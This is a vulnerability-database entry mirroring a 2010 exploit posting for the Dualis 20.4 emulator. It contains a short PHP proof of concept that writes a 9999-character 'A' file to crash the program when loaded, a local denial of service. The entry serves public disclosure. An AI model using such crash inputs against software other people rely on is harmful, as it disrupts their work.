Lucene search
+L

Dualis 20.4 Denial Of Service

🗓️ 05 Apr 2010 00:00:00Reported by Pr0T3cT10nType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Local denial of service vulnerability in Dualis 20.4 crashes software with 9999 character input.

Code
`  
  
# Exploit Title: Dualis 20.4 (.bin) Local Daniel Of Service  
# Date: 03/04/2010  
# Author: Pr0T3cT10n  
# Software Link: http://dualis.1emu.net/files/dualis-20.4.zip  
# Version: 20.4  
# Tested on: Windows XP HEBREW SP3  
# CVE : no  
# Code :  
<?php  
# Dualis 20.4 (.bin) Local Daniel Of Service  
# Software Site: http://dualis.1emu.net/  
# Software Download: http://dualis.1emu.net/files/dualis-20.4.zip  
# Author: Pr0T3cT10n <[email protected]<mailto:[email protected]>>  
# Site: http://www.nullbyte.org.il  
##################################################################  
# Dualis 20.4 is vulnerable to local denial of service attack.  
# When we try to open a file by 'Load and Execute(CTRL+R)'  
# that contains 9999 chars ('A'), so dualis should crash.  
##################################################################  
# PoC / Code:  
$buffer = str_repeat('A', 9999); # Create 9999 chars('A')..  
if(file_put_contents('crash.bin', $buffer)) {  
echo("File created successfuly.\r\nDualis should crash when you open the file with it.\r\n");  
} else {  
echo("Can't create file. Try again.\r\n");  
}  
# Cya :)  
# NULLBYTE.ORG.IL  
####################  
?>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Apr 2010 00:00Current
7.4High risk
Vulners AI Score7.4
20